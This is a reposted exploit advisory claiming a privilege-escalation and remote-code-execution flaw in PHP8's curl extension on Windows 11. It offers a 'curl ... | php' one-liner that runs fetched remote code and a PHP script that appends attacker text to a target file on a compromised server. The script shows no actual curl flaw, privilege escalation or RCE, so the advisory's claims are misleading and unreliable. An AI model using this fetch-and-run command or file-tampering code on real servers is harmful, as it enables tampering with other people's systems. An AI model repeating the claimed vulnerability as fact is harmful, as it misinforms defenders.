PHP8: php-curl from Curl-8.4.0 Windows11 Privilage-Escalation RCE
2023-12-8 06:19:57 Author: cxsecurity.com(查看原文) 阅读量:8 收藏

PHP8: php-curl from Curl-8.4.0 Windows11 Privilage-Escalation RCE

## Title: PHP8: php-curl from Curl-8.4.0 Windows11 Privilage-Escalation RCE ## Author: nu11secur1ty ## Date: 12/04/2023 ## Vendor: https://www.php.net/manual/en/function.curl-close ## Software: https://www.php.net/manual/en/book.curl.php ## Reference: https://portswigger.net/web-security/access-control ## Description: A successful attack can be possible when the attacker is hacking the Windows web server, like XAMPP, IIS, or just some LAMP service. The attacker must find a weak sanitizing function to upload the malicious PHP exploit and exploit this vulnerability. STATUS: MEDIUM-HIGH Vulnerability [+]Exploit execution: ```curl curl -s https://victim.com/your_exploit.php | php ``` [+] Exploit: ```PHP <?php // This variable has content, which content is your target after you upload the exploit. $file = 'Your\Windows\Server\environment\target\file.something'; // The new content to add to the file $person = "Your_message_for_the_victim\n"; // Write the contents to the file, // using the FILE_APPEND flag to append the content to the end of the file // and the LOCK_EX flag to prevent anyone else writing to the file at the same time file_put_contents($file, $person, FILE_APPEND | LOCK_EX); echo "Done, the exploit is successfully deployed!" ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/PHP8-Curl) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/12/php8-php-curl-rce-privilage-escalation.html) ## Time spent: 03:17:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2023120010
如有侵权请联系:admin#unsafe.sh